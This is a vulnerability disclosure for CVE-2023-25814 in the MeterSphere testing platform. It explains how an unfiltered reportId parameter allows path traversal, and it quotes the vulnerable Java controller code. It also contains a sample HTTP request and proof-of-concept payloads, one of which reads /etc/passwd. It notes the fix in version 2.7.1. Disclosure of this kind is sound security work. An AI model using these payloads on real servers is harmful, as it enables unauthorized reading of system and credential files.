Headline
CVE-2023-25814: Arbitrary File Read Vulnerability
metersphere is an open source continuous testing platform. In versions prior to 2.7.1 a user who has permission to create a resource file through UI operations is able to append a path to their submission query which will be read by the system and displayed to the user. This allows a users of the system to read arbitrary files on the filesystem of the server so long as the server process itself has permission to read the requested files. This issue has been addressed in version 2.7.1. All users are advised to upgrade. There are no known workarounds for this issue.
Summary
The system has an arbitrary file reading vulnerability, which can read the /etc/passwd file of the system.
This vulnerability affects versions v1.20.19-lts (latest) and below (v1.20.18-lts-b1 is also affected). Installation method reference: https://metersphere.io/docs/v2.x/installation/online_installation/
Details
You need to create a resource file through UI operations. For convenience, you can also create a test file directly from the image.
The file directory is as follows:
where 1 is the reportId parameter in the corresponding interface of the directory, 1 txt is the fileName parameter in the fileName interface corresponding to the file name. 2. txt is the first file read.
The interfaces are:
GET /resource/ui/get?fileName=2&reportId=2 HTTP/1.1
Cookie: SESSION=ZjllMjRjMWEtMmRhNC00MGU0LTlkMjMtOGY1MDllOWI1ZWE3 X-Schema: http
Accept: /
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Connection: keep-alive
Referencing: http://192.168.11.77:8081/swagger-ui/index.html?configUrl=/v3/api-docs/swagger-config
Host: 192.168.11.77:8081
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
CSRF-TOKEN: rcK0OGd0O5Df14tmgilfoCSsiJaS9OiQugGZWf19A/yCU2SXvLnPTPZNwiG9AUj0RWtFWbWCencuKk/L+90++A==
PoC
2.2 Read 2 txt
Payload :
/resource/ui/get?fileName=2.txt&reportId=1/…
Effect:
2.3 Read the passwd file
Payload:
/resource/ui/get?fileName=passwd&reportId=1/… /… /… /… /… /… /… /… /etc/
Effect:
Impact
Source code analysis
The read interface ResourceController .java at (framework/sdk-parent/sdk/src/main/java/io/metersphere/controller/ResourceController.java).
The code is:
@GetMapping(value = “/ui/get”)
public ResponseEntity getUiFile(@RequestParam (“fileName”) String fileName, @RequestParam (“reportId”) String reportId) {
return resourceService.getUiResultImage(fileName, reportId);
}
The trace resourceService’s method of reading a file getUiResultImage(fileName, reportId) is as follows:
public ResponseEntity getUiResultImage(String name, String reportId) {
if (name.contains(“/”)) {
MSException.throwException(Translator.get(“invalid_parameter”));
}
return getImage(FileUtils.UI_IMAGE_DIR + “/” + reportId + “/” + name);
}
Obviously, name has filtering, while reportId does not. In this way, name does not need to enter /, and can be read with reportId.